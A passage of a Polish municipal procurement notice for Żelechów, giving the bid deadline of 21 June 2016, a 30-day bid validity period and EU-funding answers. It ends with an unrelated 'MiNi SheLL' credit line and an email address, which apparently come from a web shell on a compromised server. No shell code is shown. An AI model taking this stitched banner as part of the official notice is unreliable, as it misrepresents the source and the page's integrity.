<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2016 godzina 12:00, miejsce: Urząd Miejski w Żelechowie, ul. Marszałka Józefa Piłsudskiego 47, 08-430 Żelechów, sekretariat Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com